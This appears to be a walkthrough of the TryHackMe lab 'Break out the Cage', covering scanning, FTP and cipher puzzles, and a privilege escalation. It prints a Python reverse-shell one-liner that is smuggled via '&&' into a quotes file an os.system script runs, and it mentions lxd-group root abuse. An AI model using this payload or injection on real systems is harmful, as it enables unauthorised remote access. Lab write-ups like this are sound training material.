Break out the cage

In this post, we will look into the room “Break out the Cage” from TryHackMe, which can be found on https://tryhackme.com

nmap

Start the box with a nmap scan to identify what services are running on the box, including the version of the service.

# Nmap 7.80 scan initiated Mon Jun 15 20:39:20 2020 as: nmap -sC -sV -Pn -o cage 10.10.164.244
Nmap scan report for 10.10.164.244
Host is up (0.24s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 0        0             396 May 25 23:33 dad_tasks
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.1.122.133
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 2
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 dd:fd:88:94:f8:c8:d1:1b:51:e3:7d:f8:1d:dd:82:3e (RSA)
|   256 3e:ba:38:63:2b:8d:1c:68:13:d5:05:ba:7a:ae:d9:3b (ECDSA)
|_  256 c0:a6:a3:64:44:1e:cf:47:5f:85:f6:1f:78:4c:59:d8 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Nicholas Cage Stories
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jun 15 20:40:04 2020 -- 1 IP address (1 host up) scanned in 44.21 seconds

From the scan we identified three services running:

ffuf

We now run ffuf, which is a website fuzzer used to identify files and folders

 Documents/tryhackme/BreakOutTheCage [I] ➜ ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-small.txt -u http://10.10.111.15/FUZZ -ic -c -t 100 --timeout 60           ✘130 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v1.0.2
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.111.15/FUZZ
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 60
 :: Threads          : 100
 :: Matcher          : Response status: 200,204,301,302,307,401,403
________________________________________________

html                    [Status: 301, Size: 311, Words: 20, Lines: 10]
images                  [Status: 301, Size: 313, Words: 20, Lines: 10]
scripts                 [Status: 301, Size: 314, Words: 20, Lines: 10]
contracts               [Status: 301, Size: 316, Words: 20, Lines: 10]
auditions               [Status: 301, Size: 316, Words: 20, Lines: 10]

The results give us five directories

/images - various images
/html - empty
/scipts - various text files
/contracts - an empty file
/audition - an mp3 file

Out of all the files, it is the mp3 files that is of interest. This is because upon hearing there is an odd sound high pitched sound for 3 seconds, hence we need spectogram analyser e.g. sonic visualiser

ftp

From the nmap scan we know that we have anonymous access to ftp, hence we can try connecting to ftp and see what we can access

ftp 10.10.220.59

However, after connecting to the ftp server we cannot issue an ls command since we are on active mode, hence need to switch to passive mode to issue the ls command. We can finally see that we have a file dad_tasks

UWFwdyBFZWtjbCAtIFB2ciBSTUtQLi4uWFpXIFZXVVIuLi4gVFRJIFhFRi4uLiBMQUEgWlJHUVJPISEhIQpTZncuIEtham5tYiB4c2kgb3d1b3dnZQpGYXouIFRtbCBma2ZyIHFnc2VpayBhZyBvcWVpYngKRWxqd3guIFhpbCBicWkgYWlrbGJ5d3FlClJzZnYuIFp3ZWwgdnZtIGltZWwgc3VtZWJ0IGxxd2RzZmsKWWVqci4gVHFlbmwgVnN3IHN2bnQgInVycXNqZXRwd2JuIGVpbnlqYW11IiB3Zi4KCkl6IGdsd3cgQSB5a2Z0ZWYuLi4uIFFqaHN2Ym91dW9leGNtdndrd3dhdGZsbHh1Z2hoYmJjbXlkaXp3bGtic2lkaXVzY3ds

This is a base64 string, hence we can decode it

Qapw Eekcl - Pvr RMKP...XZW VWUR... TTI XEF... LAA ZRGQRO!!!!
Sfw. Kajnmb xsi owuowge
Faz. Tml fkfr qgseik ag oqeibx
Eljwx. Xil bqi aiklbywqe
Rsfv. Zwel vvm imel sumebt lqwdsfk
Yejr. Tqenl Vsw svnt "urqsjetpwbn einyjamu" wf.

Iz glww A ykftef.... Qjhsvbouuoexcmvwkwwatfllxughhbbcmydizwlkbsidiuscwl

However, this looks like another encoded message or encrypted message

Using a cipher identifier we can identify what type of string it is, and the text is a ` Vigenere Cipher`, meaning we need a key.

Enumeration

Sonic Visualizer

must_practice_corrupt_file.mp3

We use sonic visualiser and load the file

We then go to Layer -> Add Spectogram -> All Channels Mixed from which we can see some text

We can try to use this text as the key for Vigenere Cipher discovered earlier

Cyber-Chef

dad_tasks

In cyber-chef we paste the text we found from the ftp directory

We then load recipies, in this order:

Base64 decode
Vigenère decode

For the Vigenère key, we use the text recovered from the previous step

If everthing goes accordingly, we get the resulting text

Dads Tasks - The RAGE...THE CAGE... THE MAN... THE LEGEND!!!!
One. Revamp the website
Two. Put more quotes in script
Three. Buy bee pesticide
Four. Help him with acting lessons
Five. Teach Dad what "information security" is.

In case I forget.... 
Mydad..

Where the Mydad… is the first flag

Exploitation

Weston

Now that we have the password of Weston, we can ssh to the machine

We now execute the id command to see which groups we are in

weston@national-treasure:~$ id
uid=1001(weston) gid=1001(weston) groups=1001(weston),1000(cage)

Something to note is that we are also in the cage group.

We can now run pspy64, a tool to examine running process in the machine. Upon running we find something interesting

The results shows that there is process running as different user, in this case, Cage. Therefore we try to see if we can read or write in that particular file or directory

weston@national-treasure:~$ ls -la /opt/.dads_scripts/
total 16
drwxr-xr-x 3 cage cage 4096 May 26 08:36 .
drwxr-xr-x 3 root root 4096 May 25 23:50 ..
drwxrwxr-x 2 cage cage 4096 May 25 23:47 .files
-rwxr--r-- 1 cage cage  255 May 26 08:36 spread_the_quotes.py

weston@national-treasure:~$ ls -la /opt/.dads_scripts/.files/.quotes 
-rwxrw---- 1 cage cage 4204 May 25 23:47 /opt/.dads_scripts/.files/.quotes

This shows that group users are able to read and write in the .quotes file but only read the spread_the_quotes.py file

/opt/.dad_scripts/.files/spread_the_quotes.py

This is the python script that we discovered using the pspy tool and seems to grab a random quote from the .quotes file and process it using the os.system function and execute the wall command. Now that we know how the script works we can rewrite the .quotes file with a malicious payload

#!/usr/bin/env python

#Copyright Weston 2k20 (Dad couldnt write this with all the time in the world!)
import os
import random

lines = open("/opt/.dads_scripts/.files/.quotes").read().splitlines()
quote = random.choice(lines)
os.system("wall " + quote)

.quotes

In this file, we basically delete all the contents and add a reverse shell that will connect back as cage

It is worth noting that the double && needs to be present since it signals that if the previous command was successful, then run the following command. In this case it is a reverse shell

"hello" && python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Cage

If the previous was successfull, then a session as cage should have opened.

The first item, is to check if there is any ssh keys and surely there is one key. We can now ssh in as cage

We now find the user flag

cage@national-treasure:~$ cat Super_Duper_Checklist 
1 - Increase acting lesson budget by at least 30%
2 - Get Weston to stop wearing eye-liner
3 - Get a new pet octopus
4 - Try and keep current wife
5 - Figure out why Weston has this etched into his desk: THM{...}
cage@national-treasure:~$

Privesc

Now that we have logged in as cage, we noticed at the start that cage had a peculiar group added lxd. After a few google searches there is article that describes on how to abuse lxd privileges to gain root access.

In the event the groups part was overlooked, if you ran linenum the output would point you to the direction to look at

[+] We're a member of the (lxd) group - could possibly misuse these rights!
uid=1000(cage) gid=1000(cage) groups=1000(cage),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)

Once we have access as root, we navigate to /mnt/root/root, if directions are followed from the article, and reading email_2 we have the flag

THM{...}